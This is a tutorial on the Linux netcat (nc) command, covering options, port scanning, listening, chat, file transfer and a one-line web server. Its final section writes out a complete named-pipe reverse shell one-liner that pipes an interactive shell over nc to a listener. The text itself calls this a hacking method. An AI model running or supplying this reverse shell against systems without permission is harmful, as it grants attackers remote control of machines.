The nc (netcat) command is used to send and receive data using the TCP and UDP protocols. It may not boast a large set of functions, but at the same time it is enough to check the connection and carry out simple debugging.
We’ll look at a few examples to help you understand how to communicate over TCP and how it can be used in real life, like file sharing. In addition, let’s not forget to mention more suitable commands, yet nc has managed to become obsolete.
Syntax and options nc
General view of the nc command:
$ nc -options address port(s)
Some of the parameters are specified with specifying values, and some without them. Here is a list of the most requested options:
- -6 – use IPv6 protocol. The default is -4 and IPv4, respectively;
- -h – display help with a list of available options;
- -i delay – add a delay between sending strings or port scanning. Set in seconds;
- -l – listen mode. Used with port specification;
- -N – close the connection when the end of the file is reached when sending it;
- -n – Work with IP addresses directly without using DNS, also disable port lookup;
- -P username – specify the username for connecting to the proxy;
- -x address:port – specify the address and port for connecting to the proxy;
- -p port – specify the port number. In most cases, the port is read without specifying a parameter;
- -U – use UNIX domain socket (for interprocess communication);
- -u – use UDP protocol, TCP is used by default;
- -v verbose mode. Used in port scanning;
- -W number of_packets – close the connection after receiving a certain number of packets;
- -w timer – enable timer to limit connection time. Set in seconds;
- -z – disable sending data. Used in port scanning.
Examples of using nc
1. Port check
Port checking is one of the main uses of the nc command. To do this, just use two parameters -vz, specify the address and port. In addition, you can specify a range of addresses, but in this case it is better to weed out only open ports using the grep command. In the example, let’s check the ports of the local network address:
nc -vz 192.168.31.247 8080
nc -vz 192.168.31.247 1-1000 2>&1 | grep succeeded
In a similar way, you can scan UDP ports by adding the -u option :
nc -vzu 192.168.31.247 1-1000 2>&1 | grep succeeded
We draw your attention to the difference between TCP and UDP. UDP ports are always available.
2. Listening on a port
To listen on a port, use the -l option . In general, this is sufficient, but you can enable verbose mode:
nc -nlv 8080
Recall that when using the TCP protocol, the port must be free, otherwise you will see an error: Already in use . It is also worth noting that not all ports can be used by ordinary users, for example, port 80 (HTTP) is not only likely to be occupied by another process, but also requires superuser rights.
3. Chat and file sharing
Another useful feature of the nc command is communication. Let’s look at the simplest example – text chat. In order to start a chat on one computer, run the utility in port listening mode:
nc -lp 8080
On another computer, you will need to specify the address of the first computer and the same port. Also don’t forget to check that the port is open:
nc 0.0.0.0 8080
From this example, you can see that in this way you can both send and receive messages. Another use of the command follows from this – file sharing. We act according to a similar scenario with the only difference that we redirect the output to a file, in our case paste.txt:
nc -l 8080 > paste.txt
On another computer, the input will be the copy.txt file. It is not superfluous to use the -N option to close the connection after transferring the file:
nc -N 0.0.0.0 8080 < copy.txt
To transfer files, it is important to follow the sequence, first open listening and only then send the file.
The nc command is quite working, but not the best way to transfer files. Previously, we considered other ways to transfer files, with them you can track the progress of a file transfer, and in some cases even resume the process.
3. Simple web server
Since the nc command works with the TCP protocol, it can be used to both send and receive HTTP requests, which means that the utility can become the simplest web server. Of course, you won’t be able to launch anything more complicated than a stub page, but this operation will take almost no time, and besides, you won’t need to install anything for this.
In our example, we will generate an HTTP response with an index.html file. If we talk about the np command itself, then it would not be superfluous to set a timer with the -w 1 parameter to break the connection if the browser does not:
while true; do echo -e "HTTP/1.1 200 OKnn$(cat index.html)" | nc -l -w 1 -p 8080; done
To receive data from the site, you can form a request and send it to the advising address and port. But this method is quite complicated, so it is much better to use the more appropriate curl command.
5. Remote Shell
If you remember how we did the chat, another idea may arise – remote access to the computer shell. Previously, the nc utility had several options for opening terminal access. The -e parameter was removed from the utility a long time ago, so there will no longer be easy access to the terminal. The security of the application itself has become higher, but it can still work in conjunction with others.
Let’s show the connection using the named pipe mkfifo . But first, let’s start listening on the port on the computer on which we will gain access:
nc -lvnp 8080
Now let’s go directly to the command to open the terminal. First, delete the old named pipe ( rm /tmp/f ), create a new one in its place ( mkfifo /tmp/f ), read its contents ( cat /tmp/f ), and send a shell command to its output ( sh -i 2> &1 ). After that, it remains to run nc with output to our named pipe ( nc 0.0.0.0 8080 >/tmp/f ):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 0.0.0.0 8080 >/tmp/f
It should be understood that, in fact, this is one of the hacking methods, however, it can be useful if there are problems with ssh. In order to prevent an attack, set up a security policy and a firewall.
Findings
The Netcat command is a rather old program, its main task is to check ports. If we talk specifically about network scanning, then nmap has many more functions. But with the help of nc, you can organize the simplest client-server messaging.
You can also use nc as a remote shell, but in fact there are quite a few ways to connect besides ssh, there are even cheat sheets and entire sites, so do not forget to check what you enter in the server terminal.